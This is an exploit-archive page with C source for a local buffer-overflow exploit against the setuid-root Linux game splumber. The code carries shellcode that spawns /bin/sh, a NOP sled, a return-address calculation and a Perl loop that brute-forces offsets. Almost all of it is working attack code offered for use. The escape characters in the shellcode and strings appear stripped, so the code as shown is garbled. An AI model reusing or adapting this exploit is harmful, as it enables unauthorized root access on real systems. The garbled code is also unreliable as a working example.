[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : xsplumber - strcpy() buffer overflow
# Published : 2000-11-17
# Author : vade79
# Previous Title : HP-UX 11.0 pppd Stack Buffer Overflow Exploit
# Next Title : Oracle (oidldapd connect) Local Command Line Overflow Exploit


/*
   (linux)splumber[version2] buffer overflow, by v9[v9@fakehalo.org].  this is
   a misc. exploit for the linux-SVGAlib space plumber game.  which, as you
   know needs to be installed setuid root.  this overflow is due to a simple
   oversight in the command line parser.  uses strcpy() to copy to an unchecked
   250 byte buffer.

   note: i also noticed, other than just being setuid root in the makefile, it
         sets splumber's permissions to 4777. *g*

   ...and here is the perl script for the lazy person:

   #!/usr/bin/perl
   $i=$ARGV[0];
   while(1){
    print "using offset: $i.n";
    system("./xsplumber $i");
    $i+=50;
   }
*/

#define PATH "/usr/games/splumber"	// change to the correct path.
#define BUFFER_SIZE 257			// don't change.
#define DEFAULT_OFFSET -300		// worked for me.

static char exec[]=
  "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0fxb8x1bx56"
  "x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcdx80x33xc0x40xcdx80"
  "xe8xd7xffxffxffx2fx62x69x6ex2fx73x68x01"; // still like it.

long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
  char bof[BUFFER_SIZE];
  int i,offset;
  long ret;
  if(argc>1){offset=atoi(argv[1]);}
  else{offset=DEFAULT_OFFSET;}
  ret=(esp()-offset);
  printf("*** (linux)splumber[version2] local buffer overflow, by v9[v9@fakehalo.org].n");
  printf("*** return address: 0x%lx, offset: %d.n",ret,offset);
  for(i=0;i<(252-strlen(exec));i++){*(bof+i)=0x90;}
  memcpy(bof+i,exec,strlen(exec));
  *(long *)&bof[i+strlen(exec)]=ret; // perfect, not lazy for once.
  bof[BUFFER_SIZE-1]=0;
  if(execlp(PATH,"splumber",bof,0)){
    printf("error: program did not execute properly, check the path.n");
    exit(0);
  }
}


# www.Syue.com [2000-11-17]